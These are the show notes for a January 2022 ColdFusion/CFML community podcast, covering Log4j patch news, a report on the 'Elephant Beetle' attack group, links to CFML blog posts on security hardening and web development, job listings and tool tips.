Patreon Support
We have 37 patreons providing 97% of the funding for our Modernize or Die Podcasts via our Patreon site:
https://www.patreon.com/ortussolutions.
News and EventsUpcoming Ortus Webinar - cbwire + Alpine.js with Grant CopleyJanuary 28, 2022 - 11:00 AM CT - Central Time (US and Canada)
In this webinar, Grant, lead developer for cbwire, will showcase how to build modern, reactive CFML apps easily using very little JavaScript.
Register today:
https://www.ortussolutions.com/events/webinars Log4j UpdatesLog4j-2.17.1 patch released. CommandBox images updates with the latest log4j patched jars
Adobe updated have an updated technote:
https://helpx.adobe.com/coldfusion/kb/log4j-2-17-0-vulnerability-coldfusion.html Other libraries like Spreadsheet-CFML have updated as well.
Note: Log4j2 Support in lucee 5.3 is coming along for 5.3.9
‘Elephant Beetle’ Lurks for Months in Networks
The group blends into an environment before loading up trivial, thickly stacked, fraudulent financial transactions too tiny to be noticed but adding up to millions of dollars.
This beetle adores Java. The group is “highly proficient” with Java-based attacks and often targets legacy Java apps running on Linux machines – primarily, the Java-based web servers WebSphere and WebLogic – as a means of initial entry to a target environment, the researchers explained. Beyond that, Elephant Beetle even deploys its own, complete Java web application to do the gang’s bidding on compromised machines that are, meanwhile, chugging along, running legitimate apps.
https://threatpost.com/elephant-beetle-months-networks-financial/177393/?fbclid=IwAR0ytUYx0IOxiNXIUE1jHvqDV0ltP_hBf7XCdEyLEYHfSaKadwf01xPkHLI Adobe WorkshopsMore Adobe #ColdFusion Workshops announced, lead by Damien Bruyndonckx
2 dates announced:
February 2, 2022
9.00 AM - 4.30 PM CET
1.30 PM - 9.00 PM IST
March 09, 2022
9.00 AM - 4.30 PM CET
1.30 PM - 9.00 PM IST
https://cf-workshop.meetus.adobeevents.com/ AngularJS EOL’ed 12/31/2021
As AngularJS is faced with an uncertain future, many teams are searching for answers to the current hot topic: if you are using AngularJS, do you continue to maintain your AngularJS applications or do you migrate your applications to another framework? This is not an easy (or cheap) question to answer.
In this article, we’ll go over some of the reasons why you should consider migrating your AngularJS applications, and some ideas on how to plan and budget for a successful migration.
https://www.thisdot.co/blog/why-you-should-consider-migrating-from-angularjs-to-vue CFCasts Content Updateshttps://www.cfcasts.com Just Released
Send your suggestions at
https://cfcasts.com/supportConferences and Training
VueJS Nation Conference
Online Live Event
January 26th & 27th 2022
Register for Free
https://vuejsnation.com/ More conferencesNeed more conferences, this site has a huge list of conferences for almost any language/community.
https://confs.tech/Blogs, Tweets and Videos of the WeekTweet - Adam Cameron - TIL something new about CFOUTPUTI cannot go into details of why this is a good find, but I was unaware that one can pass an encoding algorithm name like `<cfoutput encodefor="html">` (and a bunch of others) which will automatically escape the values in `#expression#`. Didn't know that.
https://cfdocs.org/cfoutput
https://twitter.com/adam_cameron/status/1480624980668915716https://twitter.com/adam_cameronTweet - James Moberg - Microsoft taking log4j stuff seriously.While performing some #coldfusion unit testing to identify #log4j exploit attempts (that my WAF may miss), I had to obfuscate the test strings or @msftsecurity would instantly quarantine & report the script. It's good to see that Microsoft is taking this seriously. #cfml
https://twitter.com/gamesover/status/1476347523245694984https://twitter.com/gamesoverBlog - James Moberg - Log4j Exploit Pattern Detection Using ColdFusion/CFMLHere are my initial attempts at trying to detect Log4j exploit attempts that may make it past our WAF/service provider protections. While our WAF stopped requests from Trend Micro's Log4j Tester, obfuscated requests made it through. At time of testing, Azure wasn't blocking requests. I had to be a little careful with the script as Windows kept instantly quarantining the CFM files and prevented ColdFusion from executing the template.
2021-12-29: Updated rules based on Google Cloud article to additionally block rmi, ldaps & dns (in addition to stripping whitespace.)
https://dev.to/gamesover/log4j-exploit-pattern-detection-using-coldfusioncfml-4l17 Tweet - Zac Spitzer - Show some love for the VS Code CFML ExtensionAwesome to see some activity on the vscode-cfml extension, a new minor release coming soon.
If you use it, please show some love and star the repo
https://github.com/KamasamaK/vscode-cfml #lucee #coldfusion #cfml
https://twitter.com/zackster/status/1476206001384828929https://twitter.com/zacksterBlog - Ben Nadel - Building An API Client With The fetch() API In JavaScriptIn my continued effort to modernize this blog, I'm thinking about trying to replace the jQuery library with more modern techniques. I don't personally have anything against jQuery; but, by replacing it, I'll have an opportunity to learn newer - and hawter - JavaScript APIs (at the expense of robust browser support). Case in point, I want to replace the jQuery.ajax() method with a fetch()-based API client. I've never used the fetch() method before; so, this will be an exciting exploration!
When consuming an API, you should always create an API client…
https://www.bennadel.com/blog/4179-building-an-api-client-with-the-fetch-api-in-javascript.htm Blog - Ben Nadel - Showing A Comment Preview As You Type On This BlogSince comments, on this blog, are authored using Markdown (and ColdFusion), there is a delta between what you write in the intake form and what is eventually rendered in the HTML. Much of the time, this delta is expected; however, if you have small errors in your markdown syntax, you can end up with HTML that does not reflect what you had intended to publish. To help narrow the gap between input and output, I've added a comment preview functionality to this blog.
https://www.bennadel.com/blog/4178-showing-a-comment-preview-as-you-type-on-this-blog.htm Blog - Ben Nadel - Mitigating Cross-Site Scripting (XSS) Attacks With A Strict Content Security Policy (CSP) In ColdFusion 2021As I continue to evolve my blogging platform, bringing it into the modern ColdFusion era, I'm trying to catch up on best practices. Of course, I've always used SQL query parameterization to block SQL injection attacks. And, I use encodeForHtml() and encodeForHtmlAttribute() in as many places as is feasible. And when converting user-provided markdown into HTML, I use the OWASP Anti-Samy project to sanitize the HTML output. But, one thing I've never had is a Content Security Policy (CSP). A CSP is yet another line-of-defense in the war against Cross-Site Scripting (XSS) attacks.
CAUTION: I Am Not A Security Expert
https://www.bennadel.com/blog/4176-mitigating-cross-site-scripting-xss-attacks-with-a-strict-content-security-policy-csp-in-coldfusion-2021.htm Blog - Ben Nadel - preserveCaseForStructKey Doesn't Work Inside Application.cfc In Adobe ColdFusion 2021Over the New Year's holiday, I ran into a rather peculiar behavior regarding the preservation of key-casing and the serializeJson() function in Adobe ColdFusion 2021. It appears that the serialization setting for preserveCaseForStructKey doesn't apply to code that resized physically within the Application.cfc life-cycle event handlers. To demonstrate this, we can setup a simple demo in which we serialize data across the event handlers and then dump-out the response:
https://www.bennadel.com/blog/4175-preservecaseforstructkey-doesnt-work-inside-application-cfc-in-adobe-coldfusion-2021.htmBlog - Ben Nadel - Posting Comments Using Reply Emails And Postmark's Inbound Streams In ColdFusion 2021I've been a very happy Postmark customer for the last decade. Their SMTP and API services make sending and receiving emails absurdly simple. And, their Inbound webhooks allow you to treat Postmark as a reverse proxy that transforms inbound email delivery into API calls (webhooks) against your own servers. I've been wanting to use this feature on my blog forever; however, I was always afraid that it would lead to massive abuse. That said, in response to a recent spam attack, I was forced to add comment moderation. Which means, I can safely start playing with reply-based comment posting using Postmark's Inbound stream!
https://www.bennadel.com/blog/4174-posting-comments-using-reply-emails-and-postmarks-inbound-streams-in-coldfusion-2021.htm Blog - Ben Nadel - Centralizing The Error Response Handling For My ColdFusion BlogIf you've noticed that my blog has been quite quiet over the last few weeks, it's because I've dedicated December to modernizing and upgrading my blogging infrastructure. The refactoring has been extensive, to say the least; and, on the list of things that I've wanted to for a long time is centralizing my error response handling in my ColdFusion code. It took me several days to find, factor-out, and normalize my errors; but, I think I have it at a point that I can easily refine and evolve going forward.
https://www.bennadel.com/blog/4173-centralizing-the-error-response-handling-for-my-coldfusion-blog.htm CFML JobsSeveral positions available on
https://www.getcfmljobs.com/Listing over 256 ColdFusion positions from 111 companies across 131 locations in 5 Countries.
7 new jobs listed
Contract - CFML Developer at Remote - United States
Jan 11
https://www.getcfmljobs.com/viewjob.cfm?jobid=11407Full-Time - Software Developer - ColdFusion at Overland Park, KS - United States
Jan 11
https://www.getcfmljobs.com/jobs/index.cfm/united-states/Software-Developer-ColdFusion-at-Overland-Park-KS/11406Full-Time - IT Engineer Applications (Coldfusion developer/admin) : 19-0.. - United States
Jan 11
https://www.getcfmljobs.com/jobs/index.cfm/united-states/IT-Engineer-Applications-Coldfusion-developeradmin-1905340-at-Portland-OR/11405Full-Time - Senior Coldfusion Developer |LATAM| at Colon, PA - United States
Jan 11
https://www.getcfmljobs.com/jobs/index.cfm/united-states/Senior-Coldfusion-Developer-LATAM-at-Colon-PA/11404Full-Time - ColdFusion Developer at Virtual, US - United States
Jan 10
https://www.getcfmljobs.com/jobs/index.cfm/united-states/ColdFusionDev-US/11403Full-Time - Remote Software Developer (Cold Fusion) at Mississauga, ON - Canada
Dec 31
https://www.getcfmljobs.com/jobs/index.cfm/canada/Remote-CFDev-at-ON-CA/11401Full-Time - Fresh Software Engineer ( For ColdFusion Only) at Ahmedabad,.. - India
Dec 30
https://www.getcfmljobs.com/jobs/index.cfm/india/Fresh-Software-Engineer-For-ColdFusion-Only-at-Ahmedabad-Gujarat/11402 ForgeBox Module of the Week
JSON-DiffBy Scott Steinbeck
An ColdFusion utility for checking if 2 JSON objects have differences
Call JSONDiff.diff to get a detailed list of changes made between the JSON objects.
Call JSONDiff.isSame to get a simple boolean true or false.
https://www.forgebox.io/view/jsondiffVS Code Hint Tips and Tricks of the Week
Excel ViewerIf you’re working with data, there’s a high chance that you’ll also encounter an excel spreadsheet in some form. Excel Viewer makes it easy to deal with excel data in your VS Code editor by formatting long and comma-separated strings into a tabled format. This can work wonders for your .csv, .tsv, and .tab extensions.
https://marketplace.visualstudio.com/items?itemName=GrapeCity.gc-excelviewerFunny link:
https://twitter.com/dawntraoz/status/1479490317766336518Thank you to all of our Patreon SupportersThese individuals are personally supporting our open source initiatives to ensure the great toolings like CommandBox, ForgeBox, ColdBox, ContentBox, TestBox and all the other boxes keep getting the continuous development they need, and funds the cloud infrastructure at our community relies on like ForgeBox for our Package Management with CommandBox.
You can support us on Patreon here
https://www.patreon.com/ortussolutionsNow offering Annual Memberships, pay for the year and save 10% - great for businesses.